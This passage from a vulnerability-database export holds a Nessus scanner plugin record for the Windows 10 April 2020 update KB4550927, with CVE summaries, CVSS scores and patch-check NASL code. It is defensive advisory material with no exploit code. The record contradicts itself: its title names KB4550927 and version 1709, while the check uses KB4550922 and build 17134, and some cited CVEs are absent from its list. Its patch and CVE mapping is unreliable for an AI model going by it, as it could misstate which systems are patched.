vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. 
An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. 
An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1000, CVE-2020-1003)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. 
(CVE-2020-0937, CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. 
(CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could overwrite files in arbitrary locations with elevated permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. 
(CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-0940, CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. 
(CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-0969)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550927: Windows 10 Version 1709 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0699", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0821", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", 
"CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550927.NASL", "href": "https://www.tenable.com/plugins/nessus/135467", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135467);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0699\",\n \"CVE-2020-0784\",\n \"CVE-2020-0794\",\n \"CVE-2020-0821\",\n \"CVE-2020-0888\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0940\",\n \"CVE-2020-0942\",\n \"CVE-2020-0944\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1001\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1006\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n 
\"CVE-2020-1017\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1029\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"MSKB\", value:\"4550927\");\n script_xref(name:\"MSFT\", value:\"MS20-4550927\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550927: Windows 10 Version 1709 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550927.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. 
The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000, CVE-2020-1003)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. 
For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
(CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could\n overwrite files in arbitrary locations with elevated\n permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. 
(CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. 
(CVE-2020-0969, \n CVE-2020-0970)\");\n # https://support.microsoft.com/en-us/help/4550922/windows-10-update-kb4550922\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9f6f3b84\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4550922.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550922');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550922])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-05T14:16:45", "description": "The remote Windows host is missing security update 4549949.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. 
(CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could overwrite files in arbitrary locations with elevated permissions. (CVE-2020-0942)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0937, CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. 
(CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2020-0910)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. 
